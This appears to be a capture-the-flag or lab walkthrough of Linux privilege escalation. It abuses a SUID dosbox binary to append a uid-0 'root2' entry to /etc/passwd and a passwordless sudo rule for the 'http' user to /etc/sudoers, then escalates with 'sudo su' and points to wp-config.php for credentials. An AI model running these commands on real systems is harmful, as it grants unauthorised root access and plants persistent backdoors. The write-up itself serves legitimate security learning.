Privilege escalation

Enumerate using linpeas.sh

Abusing SUID dosbox

I will be writing to /etc/passwd file.

Make a password that has an encrypted root value.

openssl passwd root

Value for adding new user to passwd file.

echo "root2:4us36OQWR7F/Y:0:0:root:/root:/bin/bash"

Now I will abuse dosbox suid to write to /etc/passwd file.

LFILE='/etc/passwd'
DATA="root2:4tG5TRjVMiM.k:0:0:root:/root:/bin/bash"

/usr/bin/dosbox -c 'mount c /' -c "echo $DATA >c:$LFILE" -c exit

This overwrite the file completely.

I will try another way that is I will append my value. First, I will reset the machine and start again.

/usr/bin/dosbox -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit

This worked and our new user is added successfully.

However, I am unable to switch users. Let me create a new user root2 at beginning of the file and see if it works.

Not working.

I will change the sudoers file and give sudo access to the current user. I know that current user is http.

DATA="http ALL=(ALL) NOPASSWD: ALL"

LFILE='/etc/sudoers'

/usr/bin/dosbox -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit

Now start the new shell and switch to the root user. [Don't forget to stabilize it]

sudo su

Other things:

I didn't see the configuration file for Credential related data. I could have checked that also.

Location: "/srv/http/wp-config.php"

Last updated 1 year ago